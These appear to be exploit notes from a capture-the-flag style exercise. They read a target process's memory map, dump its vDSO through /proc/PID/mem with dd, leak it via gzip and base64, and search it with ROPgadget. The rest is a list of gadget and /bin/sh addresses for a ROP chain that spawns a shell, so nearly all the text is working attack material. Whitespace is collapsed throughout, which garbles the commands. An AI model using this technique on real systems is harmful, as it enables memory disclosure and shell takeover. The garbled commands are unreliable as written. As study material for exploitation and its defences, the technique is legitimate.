# Find addressescat/proc/76/maps08048000-08049000r--p0000000000:02317/target08049000-0804a000r-xp0000100000:02317/target0804a000-0804b000rw-p0000200000:02317/targetf7ff8000-f7ffc000r--p0000000000:000 [vvar]f7ffc000-f7ffe000r-xp0000000000:000 [vdso]fffdd000-ffffe000rw-p0000000000:000 [stack]# Dump itddif=/proc/76/memof=vdsobs=1skip=$((0xf7ffc000)) count=$((0x2000))8192+0recordsin8192+0recordsout8192bytes (8.0KB) copied, 0.901154 seconds, 8.9KB/s# Compress and leak itgzipvdsobase64vdso.gz# Decompress and check of gadgetsecho'<base64-payload>'|base64-d|gzip-d->vdsofilevdsoROPgadget--binaryvdso|grep'int 0x80'
找到的ROP gadgets:
vdso_addr =0xf7ffc000int_0x80_xor_eax_eax_ret_addr =0x8049010bin_sh_addr =0x804a800# 0x0000057a : pop edx ; pop ecx ; retpop_edx_pop_ecx_ret_addr = vdso_addr +0x57a# 0x00000cca : mov dword ptr [edx], ecx ; add esp, 0x34 ; pop ebx ; pop esi ; pop edi ; pop ebp ; retmov_dword_ptr_edx_ecx_ret_addr = vdso_addr +0xcca# 0x00000ccb : or al, byte ptr [ebx + 0x5e5b34c4] ; pop edi ; pop ebp ; retor_al_byte_ptr_ebx_pop_edi_pop_ebp_ret_addr = vdso_addr +0xccb# 0x0000015cd : pop ebx ; pop esi ; pop ebp ; retpop_ebx_pop_esi_pop_ebp_ret = vdso_addr +0x15cd